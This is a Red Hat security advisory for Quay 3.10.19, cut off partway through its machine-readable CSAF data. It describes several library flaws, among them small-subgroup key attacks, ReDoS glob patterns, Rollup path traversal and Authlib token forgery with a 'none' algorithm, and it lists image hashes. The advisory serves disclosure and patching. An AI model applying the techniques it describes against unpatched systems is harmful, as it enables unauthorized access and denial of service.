A validation flaw has been discovered in the python cryptography package. This missing validation allows an attacker to provide a public key point P from a small-order subgroup. This can lead to security issues in various situations, such as the most commonly used signature verification (ECDSA) and shared key negotiation (ECDH). When the victim computes the shared secret as S = [victim_private_key]P via ECDH, this leaks information about victim_private_key mod (small_subgroup_order). For curves with cofactor > 1, this reveals the least significant bits of the private key. When these weak public keys are used in ECDSA , it's easy to forge signatures on the small subgroup. Only SECT curves are impacted by this.
7.4 (High)
Vendor Fix
Before applying this update, make sure all previously released errata relevant
to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
https://access.redhat.com/errata/RHSA-2026:5665
Workaround
Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.
A flaw was found in minimatch. A remote attacker could exploit this Regular Expression Denial of Service (ReDoS) vulnerability by providing a specially crafted glob pattern. This pattern, containing numerous consecutive wildcard characters, causes excessive processing and exponential backtracking in the regular expression engine. Successful exploitation leads to a Denial of Service (DoS), making the application unresponsive.
6.5 (Medium)
Vendor Fix
Before applying this update, make sure all previously released errata relevant
to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
https://access.redhat.com/errata/RHSA-2026:5665
A flaw was found in Rollup, a JavaScript module bundler. Insecure file name sanitization in the core engine allows an attacker to control output filenames, potentially through command-line interface (CLI) inputs, manual chunk aliases, or malicious plugins. By using directory traversal sequences (`../`), an attacker can overwrite files anywhere on the host filesystem where the build process has write permissions. This vulnerability can lead to persistent remote code execution (RCE) by overwriting critical system or user configuration files.
9.1 (Critical)
Vendor Fix
Before applying this update, make sure all previously released errata relevant
to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
https://access.redhat.com/errata/RHSA-2026:5665
A flaw was found in pypdf. Processing a specially crafted PDF document, specifically with circular /Prev references in the cross-reference (xref) chain, can cause an infinite loop and a high consumption of CPU, resulting in a denial of service.
7.5 (High)
Vendor Fix
Before applying this update, make sure all previously released errata relevant
to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
https://access.redhat.com/errata/RHSA-2026:5665
Workaround
Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.
A flaw was found in minimatch. A remote attacker could exploit this vulnerability by providing a specially crafted glob expression with nested unbounded quantifiers. This could lead to catastrophic backtracking in the V8 JavaScript engine, causing the application to become unresponsive and resulting in a Denial of Service (DoS).
6.5 (Medium)
Vendor Fix
Before applying this update, make sure all previously released errata relevant
to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
https://access.redhat.com/errata/RHSA-2026:5665
A flaw was found in Authlib, a Python library used for creating secure authentication and authorization systems. This vulnerability, known as JWK (JSON Web Key) Header Injection, affects how Authlib verifies digital signatures in JWS (JSON Web Signature) tokens. An attacker can exploit this by creating a specially crafted token that includes their own cryptographic key in the header. When the system attempts to verify this token without a predefined key, it mistakenly uses the attacker's key, allowing them to bypass authentication and gain unauthorized access.
9.1 (Critical)
Vendor Fix
Before applying this update, make sure all previously released errata relevant
to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
https://access.redhat.com/errata/RHSA-2026:5665
A flaw was found in Authlib, a Python library for building OAuth and OpenID Connect servers. A remote attacker can exploit this vulnerability by crafting a malicious JSON Web Token (JWT) with a "none" algorithm and an empty signature. This bypasses the expected signature verification, potentially allowing the attacker to forge tokens and gain unauthorized access or perform unauthorized actions within applications using Authlib.
9.1 (Critical)
Vendor Fix
Before applying this update, make sure all previously released errata relevant
to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
https://access.redhat.com/errata/RHSA-2026:5665
Workaround
Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.
References
| URL | Category | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Red Hat Quay 3.10.19 is now available with bug fixes.",
"title": "Topic"
},
{
"category": "general",
"text": "Quay 3.10.19",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:5665",
"url": "https://access.redhat.com/errata/RHSA-2026:5665"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-61726",
"url": "https://access.redhat.com/security/cve/CVE-2025-61726"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-61728",
"url": "https://access.redhat.com/security/cve/CVE-2025-61728"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-68121",
"url": "https://access.redhat.com/security/cve/CVE-2025-68121"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-25639",
"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-25990",
"url": "https://access.redhat.com/security/cve/CVE-2026-25990"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-26007",
"url": "https://access.redhat.com/security/cve/CVE-2026-26007"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-26996",
"url": "https://access.redhat.com/security/cve/CVE-2026-26996"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-27606",
"url": "https://access.redhat.com/security/cve/CVE-2026-27606"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-27628",
"url": "https://access.redhat.com/security/cve/CVE-2026-27628"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-27904",
"url": "https://access.redhat.com/security/cve/CVE-2026-27904"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-27962",
"url": "https://access.redhat.com/security/cve/CVE-2026-27962"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-28802",
"url": "https://access.redhat.com/security/cve/CVE-2026-28802"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_5665.json"
}
],
"title": "Red Hat Security Advisory: Red Hat Quay 3.10.19",
"tracking": {
"current_release_date": "2026-04-12T20:00:58+00:00",
"generator": {
"date": "2026-04-12T20:00:58+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.7.5"
}
},
"id": "RHSA-2026:5665",
"initial_release_date": "2026-03-24T18:02:58+00:00",
"revision_history": [
{
"date": "2026-03-24T18:02:58+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-03-24T18:03:04+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-04-12T20:00:58+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Quay 3.1",
"product": {
"name": "Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:quay:3.10::el8"
}
}
}
],
"category": "product_family",
"name": "Red Hat Quay"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"product_id": "registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-container-security-operator-bundle@sha256%3A7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1774022275"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"product_id": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-container-security-operator-rhel8@sha256%3A6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1774021695"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"product_id": "registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-bridge-operator-bundle@sha256%3A042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1774022278"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"product_id": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-bridge-operator-rhel8@sha256%3Afe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1774021704"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"product_id": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-builder-qemu-rhcos-rhel8@sha256%3A443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1772739218"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"product_id": "registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-builder-rhel8@sha256%3A9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1772726823"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"product": {
"name": "registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"product_id": "registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/clair-rhel8@sha256%3Acaa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1772725047"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"product_id": "registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-operator-bundle@sha256%3Ae165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1774022285"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"product_id": "registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-operator-rhel8@sha256%3Ade004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1774021722"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"product_id": "registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-rhel8@sha256%3Ac0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1773971077"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"product": {
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"product_id": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/quay-container-security-operator-rhel8@sha256%3A720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7?arch=ppc64le\u0026repository_url=registry.redhat.io/quay\u0026tag=1774021695"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"product": {
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"product_id": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/quay-bridge-operator-rhel8@sha256%3A3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b?arch=ppc64le\u0026repository_url=registry.redhat.io/quay\u0026tag=1774021704"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"product": {
"name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"product_id": "registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/quay-builder-rhel8@sha256%3Aba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0?arch=ppc64le\u0026repository_url=registry.redhat.io/quay\u0026tag=1772726823"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"product": {
"name": "registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"product_id": "registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/clair-rhel8@sha256%3A733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41?arch=ppc64le\u0026repository_url=registry.redhat.io/quay\u0026tag=1772725047"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"product": {
"name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"product_id": "registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/quay-operator-rhel8@sha256%3A0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6?arch=ppc64le\u0026repository_url=registry.redhat.io/quay\u0026tag=1774021722"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"product": {
"name": "registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"product_id": "registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/quay-rhel8@sha256%3A6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e?arch=ppc64le\u0026repository_url=registry.redhat.io/quay\u0026tag=1773971077"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"product": {
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"product_id": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"product_identification_helper": {
"purl": "pkg:oci/quay-container-security-operator-rhel8@sha256%3Aedd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942?arch=s390x\u0026repository_url=registry.redhat.io/quay\u0026tag=1774021695"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"product": {
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"product_id": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"product_identification_helper": {
"purl": "pkg:oci/quay-bridge-operator-rhel8@sha256%3A4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58?arch=s390x\u0026repository_url=registry.redhat.io/quay\u0026tag=1774021704"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"product": {
"name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"product_id": "registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"product_identification_helper": {
"purl": "pkg:oci/quay-builder-rhel8@sha256%3A5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc?arch=s390x\u0026repository_url=registry.redhat.io/quay\u0026tag=1772726823"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"product": {
"name": "registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"product_id": "registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"product_identification_helper": {
"purl": "pkg:oci/clair-rhel8@sha256%3Ad59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f?arch=s390x\u0026repository_url=registry.redhat.io/quay\u0026tag=1772725047"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"product": {
"name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"product_id": "registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"product_identification_helper": {
"purl": "pkg:oci/quay-operator-rhel8@sha256%3A0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4?arch=s390x\u0026repository_url=registry.redhat.io/quay\u0026tag=1774021722"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x",
"product": {
"name": "registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x",
"product_id": "registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x",
"product_identification_helper": {
"purl": "pkg:oci/quay-rhel8@sha256%3Af6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a?arch=s390x\u0026repository_url=registry.redhat.io/quay\u0026tag=1773971077"
}
}
}
],
"category": "architecture",
"name": "s390x"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le as a component of Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le"
},
"product_reference": "registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"relates_to_product_reference": "Red Hat Quay 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64 as a component of Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64"
},
"product_reference": "registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"relates_to_product_reference": "Red Hat Quay 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x as a component of Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x"
},
"product_reference": "registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"relates_to_product_reference": "Red Hat Quay 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64 as a component of Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"relates_to_product_reference": "Red Hat Quay 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le as a component of Red Hat Quay 3.1",
